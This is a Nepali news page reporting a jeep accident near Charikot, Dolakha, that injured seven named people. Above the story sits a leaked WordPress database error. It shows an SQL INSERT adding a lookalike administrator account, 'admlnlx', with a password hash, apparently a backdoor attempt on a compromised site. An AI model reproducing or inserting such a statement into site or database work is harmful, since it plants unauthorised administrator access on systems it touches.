WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKw8WoBX9sbbhKOhQyJsn4hOM1s4nb0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 20:18:00', '', 'admlnlx', 'admlnlx')
चरिकोट (दोलखा), माघ ४-
लाकुरीडाँडा गाविस– ८ आहालेडाँडामा आज जिप दुर्घटना हुँदा सात जना घाइते भएका छन् ।
काठमाडौँदेखि सदरमुकाम चरिकोटतर्फ आउँदै गरेको ना१ज ४९७८ नंको जिप दुर्घटना हुँदा गैरीमुदी गाविस– ७ विमला पाख्रिन र मोहनबहादुर तामाङ, मिर्गे– १ का साइना तामाङ, भेड्पु गाविसका सुजन लामा र उषा तामाङ तथा शैलुङ्गेश्वर– ६ विकास लामा र पवित्रा तामाङ घाइते भएका छन् ।
विपरीत दिशाबाट आउँदै गरेको बसलाई बाटो दिँदा उक्त जिप दुर्घटनामा परेको प्रहरी नायब उपरीक्षक रविन कार्कीले जानकारी दिनुभयो । घाइतेलाई उपचारका लागि चरिकोटस्थित सामुदायिक अस्पताल र प्राथमिक स्वास्थ्य केन्द्रमा ल्याउँदै गरेको प्रहरीले जनाएको छ ।- रासस